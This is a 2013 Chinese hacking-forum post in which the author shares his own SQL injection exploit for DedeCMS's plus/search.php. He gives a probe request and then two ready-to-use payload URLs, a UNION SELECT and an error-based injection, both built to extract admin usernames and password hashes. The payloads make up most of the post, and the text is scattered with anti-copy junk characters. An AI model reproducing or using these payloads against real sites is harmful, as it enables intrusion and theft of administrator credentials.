转载不加作者名的没JJ3 t ^/ M7 x9 V$ Q
5 u6 y9 s. V, ]8 D, t! k
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。* x i4 _2 z: r
2 L" c5 Y4 @* U* |: ?
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。8 B4 O/ L5 E- V. _/ M" Y& W2 D8 m
- N- W! F0 [' f; X- s我一般是这样测试的:
; M3 U3 O! U1 |, n4 K) L* c
6 ^5 F0 ~/ }0 I5 }提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a5 i- D) k) L* Z. H, t3 L# a E3 a
" a% _6 F& a/ J/ d8 B转载不加作者名的没JJ
$ H, E' Z. j1 @6 X0 F" U' u0 Y5 f! S
作者:鬼哥9 G+ \7 Q, R6 X3 K( O/ B3 }( w
: H: T+ K7 R% H
2 A+ _; P* T4 v
& R0 @+ O" C' Z# |( f! S# Y: ~看结果如果提示$ P6 `* S1 y& U1 e ^, s
8 w" N, e- _3 n1 A, l/ {& f3 v
Safe Alert: Request Error step 2 !
" N L4 Q- W, E1 \- c5 w; i' v. ~
8 s1 T) k- r, F$ g# t" N1 |3 Y那么直接用下面的exp
3 i o- Q# w9 m9 e: P: q" \! g# F/ F5 O% B$ F3 r5 M
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a3 R7 y" X0 V1 S) O z
- W) s0 ?+ n- Q3 L+ j
$ }3 w$ P; r9 ~, v8 D( g2 e& d看结果如果提示4 N. u8 q! C' h5 t2 k- ]2 N
3 g4 E1 ?) x B7 H* R& dSafe Alert: Request Error step 1 !
5 F3 [1 M3 d& M8 J7 l, a/ p( P0 u, e! L% d) P" [' I$ b% M% g
那么直接用下面的exp
1 k" O) j& `' d) C, K2 l5 o' \) h) y6 i: p$ J3 q
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
$ v/ Y* H; r' r, ?2 u& A6 F, d$ K( s" ]5 M9 }. ~# {
l7 P* k Y" E5 h9 D5 z如果正常显示证明漏洞不存在了。. k# @$ ?1 A# p p
9 o% o% O2 r* m
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对